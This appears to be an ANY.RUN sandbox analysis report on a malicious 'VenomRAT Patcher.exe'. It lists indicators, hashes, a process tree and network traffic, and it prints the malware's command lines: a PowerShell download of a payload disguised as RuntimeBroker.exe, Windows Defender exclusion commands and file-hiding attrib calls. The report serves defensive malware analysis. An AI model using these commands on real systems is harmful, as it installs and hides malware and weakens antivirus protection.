File name: VenomRAT Patcher.exe

Full analysis: https://app.any.run/tasks/6f9f6d32-2b90-480d-b87b-aa6836dce09d
Verdict: Malicious activity
Analysis date: May 17, 2025, 05:29:47
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
python
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 7 sections
MD5: 07C653D74342733B925F3CE700A75604
SHA1: 3EBBECF91881F8D666E74211C0C9662CFDB6B1DF
SHA256: F949F581B93CB366EBF915797331A45FDF856B123ECAEEF8BDB42D5F0DDBDFE8
SSDEEP: 98304:CCYzBnbSb4Y6ZhkDQet54nHZUj0vU9XLDbenkuA83wpYp2twldaQ0EACheua5DRC:sp2z881mwH/kit496ikY

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6488)
      • powershell.exe (PID: 6944)
      • powershell.exe (PID: 2316)
      • powershell.exe (PID: 5304)
      • powershell.exe (PID: 1052)
      • powershell.exe (PID: 6040)
      • powershell.exe (PID: 6228)
      • powershell.exe (PID: 5204)
      • powershell.exe (PID: 1600)
      • powershell.exe (PID: 3884)
      • powershell.exe (PID: 6736)
      • powershell.exe (PID: 2288)
      • powershell.exe (PID: 1760)
      • powershell.exe (PID: 5084)
    • Changes Windows Defender settings

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 6048)
      • cmd.exe (PID: 5024)
    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 5024)
      • cmd.exe (PID: 6048)
  • SUSPICIOUS

    • Process drops legitimate windows executable

      • VenomRAT Patcher.exe (PID: 2656)
      • powershell.exe (PID: 1852)
    • Process drops python dynamic module

      • VenomRAT Patcher.exe (PID: 2656)
    • Executable content was dropped or overwritten

      • VenomRAT Patcher.exe (PID: 2656)
      • powershell.exe (PID: 1852)
      • RuntimeBroker.exe (PID: 6132)
    • The process drops C-runtime libraries

      • VenomRAT Patcher.exe (PID: 2656)
    • Application launched itself

      • VenomRAT Patcher.exe (PID: 2656)
    • Loads Python modules

      • VenomRAT Patcher.exe (PID: 4224)
    • Starts CMD.EXE for commands execution

      • VenomRAT Patcher.exe (PID: 4224)
      • wscript.exe (PID: 5552)
      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
      • RuntimeBroker.exe (PID: 3032)
      • RuntimeBroker.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 5172)
      • RuntimeBroker.exe (PID: 5176)
      • RuntimeBroker.exe (PID: 5544)
      • RuntimeBroker.exe (PID: 5968)
      • RuntimeBroker.exe (PID: 2064)
      • RuntimeBroker.exe (PID: 444)
      • RuntimeBroker.exe (PID: 6264)
      • RuntimeBroker.exe (PID: 5972)
    • Executing commands from a ".bat" file

      • VenomRAT Patcher.exe (PID: 4224)
      • wscript.exe (PID: 5552)
      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
      • RuntimeBroker.exe (PID: 3032)
      • RuntimeBroker.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 5172)
      • RuntimeBroker.exe (PID: 5544)
      • RuntimeBroker.exe (PID: 5176)
      • RuntimeBroker.exe (PID: 5968)
      • RuntimeBroker.exe (PID: 2064)
      • RuntimeBroker.exe (PID: 444)
      • RuntimeBroker.exe (PID: 6264)
      • RuntimeBroker.exe (PID: 5972)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1300)
      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 5024)
      • cmd.exe (PID: 6048)
    • The process executes VB scripts

      • cmd.exe (PID: 1300)
    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 1300)
      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 6048)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 5024)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 5552)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 6048)
      • cmd.exe (PID: 5024)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 4784)
      • cmd.exe (PID: 7152)
      • cmd.exe (PID: 4692)
      • cmd.exe (PID: 5728)
      • cmd.exe (PID: 5280)
      • cmd.exe (PID: 4884)
      • cmd.exe (PID: 1196)
      • cmd.exe (PID: 1568)
      • cmd.exe (PID: 3896)
      • cmd.exe (PID: 1180)
      • cmd.exe (PID: 2152)
      • cmd.exe (PID: 5024)
      • cmd.exe (PID: 6048)
    • The executable file from the user directory is run by the CMD process

      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
      • RuntimeBroker.exe (PID: 3032)
      • RuntimeBroker.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 5172)
      • RuntimeBroker.exe (PID: 5544)
      • RuntimeBroker.exe (PID: 5176)
      • RuntimeBroker.exe (PID: 5968)
      • RuntimeBroker.exe (PID: 2064)
      • RuntimeBroker.exe (PID: 444)
      • RuntimeBroker.exe (PID: 6264)
      • RuntimeBroker.exe (PID: 5972)
    • Reads the date of Windows installation

      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
    • Executes application which crashes

      • XWorm V5.6 Crack.exe (PID: 3676)
      • XWorm V5.6 Crack.exe (PID: 5244)
      • XWorm V5.6 Crack.exe (PID: 1628)
      • XWorm V5.6 Crack.exe (PID: 2320)
      • XWorm V5.6 Crack.exe (PID: 6760)
      • XWorm V5.6 Crack.exe (PID: 6632)
      • XWorm V5.6 Crack.exe (PID: 444)
      • XWorm V5.6 Crack.exe (PID: 2064)
      • XWorm V5.6 Crack.exe (PID: 3884)
      • XWorm V5.6 Crack.exe (PID: 6640)
      • XWorm V5.6 Crack.exe (PID: 1600)
      • XWorm V5.6 Crack.exe (PID: 5984)
    • Reads security settings of Internet Explorer

      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
  • INFO

    • Reads the computer name

      • VenomRAT Patcher.exe (PID: 2656)
      • VenomRAT Patcher.exe (PID: 4224)
      • RuntimeBroker.exe (PID: 6132)
      • XWorm V5.6 Crack.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 1012)
      • XWorm V5.6 Crack.exe (PID: 5244)
    • Checks supported languages

      • VenomRAT Patcher.exe (PID: 2656)
      • VenomRAT Patcher.exe (PID: 4224)
      • RuntimeBroker.exe (PID: 6132)
      • XWorm V5.6 Crack.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 1012)
      • XWorm V5.6 Crack.exe (PID: 5244)
    • The sample compiled with english language support

      • VenomRAT Patcher.exe (PID: 2656)
    • Create files in a temporary directory

      • VenomRAT Patcher.exe (PID: 2656)
      • VenomRAT Patcher.exe (PID: 4224)
      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
    • Checks proxy server information

      • VenomRAT Patcher.exe (PID: 4224)
      • powershell.exe (PID: 1852)
      • powershell.exe (PID: 872)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 664)
      • powershell.exe (PID: 4728)
      • powershell.exe (PID: 872)
      • powershell.exe (PID: 2800)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 664)
      • powershell.exe (PID: 4728)
      • powershell.exe (PID: 2800)
    • Disables trace logs

      • powershell.exe (PID: 1852)
      • powershell.exe (PID: 872)
    • Reads the machine GUID from the registry

      • RuntimeBroker.exe (PID: 6132)
      • XWorm V5.6 Crack.exe (PID: 3676)
      • RuntimeBroker.exe (PID: 1012)
      • XWorm V5.6 Crack.exe (PID: 5244)
    • Process checks computer location settings

      • RuntimeBroker.exe (PID: 6132)
      • RuntimeBroker.exe (PID: 1012)
    • Creates files or folders in the user directory

      • WerFault.exe (PID: 2800)
      • WerFault.exe (PID: 672)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:05:17 04:50:08+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.43
CodeSize: 173568
InitializedDataSize: 101888
UninitializedDataSize: -
EntryPoint: 0xce30
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
All screenshots are available in the full report
Total processes: 295
Monitored processes: 149
Malicious processes: 26
Suspicious processes: 0

Behavior graph

Behavior graph: the interactive process tree is rendered in the full report. Nodes shown: start, venomrat patcher.exe (two instances), cmd.exe, conhost.exe, powershell.exe, sppextcomobj.exe, slui.exe, cacls.exe, wscript.exe, attrib.exe, runtimebroker.exe, xworm v5.6 crack.exe and werfault.exe. The cmd.exe, conhost.exe, powershell.exe, cacls.exe, attrib.exe, runtimebroker.exe, xworm v5.6 crack.exe, werfault.exe chain repeats for each relaunch of RuntimeBroker.exe ("no specs" marks nodes without detected indicators).

Process information

PID | CMD | Path | Indicators | Parent process

300 | attrib +h "C:\Users\admin\AppData\Local\Anon\RuntimeBroker.exe" /s /d | C:\Windows\System32\attrib.exe | | cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Attribute Utility
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
444 | "C:\Users\admin\AppData\Local\Temp\XWorm V5.6 Crack.exe" | C:\Users\admin\AppData\Local\Temp\XWorm V5.6 Crack.exe | | RuntimeBroker.exe
User: admin
Company: @ThreatCommunity
Integrity Level: HIGH
Description: XWorm by @ThreatCommunity
Exit code: 3762504530
Version: 5.6.0.0
Modules
Images
c:\users\admin\appdata\local\temp\xworm v5.6 crack.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
444 | RuntimeBroker.exe | C:\Users\admin\AppData\Local\Anon\RuntimeBroker.exe | | cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Update Assistant
Exit code: 0
Version: 10.0.18362.1
Modules
Images
c:\users\admin\appdata\local\anon\runtimebroker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
664 | powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
672 | C:\WINDOWS\system32\WerFault.exe -u -p 5244 -s 932 | C:\Windows\System32\WerFault.exe | | XWorm V5.6 Crack.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows Problem Reporting
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\werfault.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
680 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | | cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
812 | Powershell -Command "Invoke-Webrequest 'https://github.com/wha-gifart/gifart/releases/download/SDA/RuntimeBroker.exe' -OutFile RuntimeBroker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
864 | "C:\WINDOWS\system32\cacls.exe" "C:\WINDOWS\system32\config\system" | C:\Windows\System32\cacls.exe | | cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Control ACLs Program
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cacls.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
872 | Powershell -Command "Invoke-Webrequest 'https://github.com/wha-gifart/gifart/releases/download/SDA/RuntimeBroker.exe' -OutFile RuntimeBroker.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Windows PowerShell
Exit code: 1
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\atl.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\user32.dll
c:\windows\system32\ucrtbase.dll
924 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | | cmd.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 211 809
Read events: 211 717
Write events: 56
Delete events: 36

Modification events

(PID) Process: (1300) cmd.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation: write
Name: VBSFile
Value:

(PID) Process: (2800) WerFault.exe
Key: \REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation: write
Name: ProgramId
Value: 00064ee32d88d6ce3eb386c7e88f7c8d705600000000

(PID) Process: (2800) WerFault.exe
Key: \REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation: write
Name: FileId
Value: 00003547dfaa6e524a367aff90b685bdb5e728c1bfeb

(PID) Process: (2800) WerFault.exe
Key: \REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation: write
Name: LowerCaseLongPath
Value: c:\users\admin\appdata\local\temp\xworm v5.6 crack.exe

(PID) Process: (2800) WerFault.exe
Key: \REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation: write
Name: LongPathHash
Value: xworm v5.6 crack|b448236e62d20cab

(PID) Process: (2800) WerFault.exe
Key: \REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation: write
Name: Name
Value: XWorm V5.6 Crack.exe

(PID) Process: (2800) WerFault.exe
Key: \REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation: write
Name: OriginalFileName
Value: xworm.exe

(PID) Process: (2800) WerFault.exe
Key: \REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation: write
Name: Publisher
Value: @threatcommunity

(PID) Process: (2800) WerFault.exe
Key: \REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation: write
Name: Version
Value: 5.6.0.0

(PID) Process: (2800) WerFault.exe
Key: \REGISTRY\A\{89a7e89a-df9a-2d6b-152b-41dd8fc4cd5d}\Root\InventoryApplicationFile\xworm v5.6 crack|b448236e62d20cab
Operation: write
Name: BinFileVersion
Value: 5.6.0.0
Executable files: 57
Suspicious files: 27
Text files: 93
Unknown types: 0

Dropped files

PID | Process | Filename | Type

2656 | VenomRAT Patcher.exe | C:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-fibers-l1-1-0.dll | executable
MD5: B5E2760C5A46DBEB8AE18C75F335707E
SHA256: 91D249D7BC0E38EF6BCB17158B1FDC6DD8888DC086615C9B8B750B87E52A5FB3

2656 | VenomRAT Patcher.exe | C:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-fibers-l1-1-1.dll | executable
MD5: 050A30A687E7A2FA6F086A0DB89AA131
SHA256: FC9D86CEC621383EAB636EBC87DDD3F5C19A3CB2A33D97BE112C051D0B275429

2656 | VenomRAT Patcher.exe | C:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-debug-l1-1-0.dll | executable
MD5: 226A5983AE2CBBF0C1BDA85D65948ABC
SHA256: 591358EB4D1531E9563EE0813E4301C552CE364C912CE684D16576EABF195DC3

2656 | VenomRAT Patcher.exe | C:\Users\admin\AppData\Local\Temp\_MEI26562\_socket.pyd | executable
MD5: 566CB4D39B700C19DBD7175BD4F2B649
SHA256: 77EBA293FE03253396D7BB6E575187CD026C80766D7A345EB72AD92F0BBBC3AA

2656 | VenomRAT Patcher.exe | C:\Users\admin\AppData\Local\Temp\_MEI26562\_lzma.pyd | executable
MD5: D63E2E743EA103626D33B3C1D882F419
SHA256: 7C2D2030D5D246739C5D85F087FCF404BC36E1815E69A8AC7C9541267734FC28

2656 | VenomRAT Patcher.exe | C:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-console-l1-1-0.dll | executable
MD5: 9F746F4F7D845F063FEA3C37DCEBC27C
SHA256: 88ACE577A9C51061CB7D1A36BABBBEFA48212FADC838FFDE98FDFFF60DE18386

2656 | VenomRAT Patcher.exe | C:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-datetime-l1-1-0.dll | executable
MD5: 8F8EB9CB9E78E3A611BC8ACAEC4399CB
SHA256: 1BD81DFD19204B44662510D9054852FB77C9F25C1088D647881C9B976CC16818

2656 | VenomRAT Patcher.exe | C:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-file-l1-1-0.dll | executable
MD5: 9F45A47EBFD9D0629F4935764243DD5A
SHA256: 1CA895ABA4E7435563A6B43E85EBA67A0F8C74AA6A6A94D0FC48FA35535E2585

2656 | VenomRAT Patcher.exe | C:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-errorhandling-l1-1-0.dll | executable
MD5: C2F8C03ECCE9941492BFBE4B82F7D2D5
SHA256: D56CE7B1CD76108AD6C137326EC694A14C99D48C3D7B0ACE8C3FF4D9BCEE3CE8

2656 | VenomRAT Patcher.exe | C:\Users\admin\AppData\Local\Temp\_MEI26562\api-ms-win-core-file-l2-1-0.dll | executable
MD5: E368A236F5676A3DA44E76870CD691C9
SHA256: 93C624B366BA16C643FC8933070A26F03B073AD0CF7F80173266D67536C61989
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 7
TCP/UDP connections: 50
DNS requests: 20
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN/Type/Size | Reputation
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.216.77.6:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
| | GET | 304 | 23.216.77.6:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
5496 | MoUsoCoreWorker.exe | GET | 200 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
| | GET | 304 | 23.35.229.160:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
2384 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
2384 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | | | | whitelisted
4 | System | 192.168.100.255:138 | | | | whitelisted
| | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
5496 | MoUsoCoreWorker.exe | 23.216.77.6:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
5496 | MoUsoCoreWorker.exe | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
| | 23.216.77.6:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
| | 23.35.229.160:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
3216 | svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
4224 | VenomRAT Patcher.exe | 140.82.121.4:443 | github.com | GITHUB | US | whitelisted
4224 | VenomRAT Patcher.exe | 185.199.109.133:443 | objects.githubusercontent.com | FASTLY | US | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 40.127.240.158, 51.124.78.146 | whitelisted
google.com | 142.250.185.78 | whitelisted
crl.microsoft.com | 23.216.77.6, 23.216.77.42, 23.216.77.28 | whitelisted
www.microsoft.com | 23.35.229.160, 184.30.21.171 | whitelisted
client.wns.windows.com | 172.211.123.249 | whitelisted
github.com | 140.82.121.4, 140.82.121.3 | whitelisted
objects.githubusercontent.com | 185.199.109.133, 185.199.110.133, 185.199.111.133, 185.199.108.133 | whitelisted
login.live.com | 40.126.31.69, 40.126.31.73, 40.126.31.2, 40.126.31.0, 20.190.159.64, 20.190.159.73, 40.126.31.129, 40.126.31.130, 20.190.159.131, 20.190.159.68, 20.190.159.75, 20.190.159.23, 20.190.159.0 | whitelisted
ocsp.digicert.com | 2.17.190.73 | whitelisted
slscr.update.microsoft.com | 4.175.87.197 | whitelisted

Threats

No threats detected
No debug info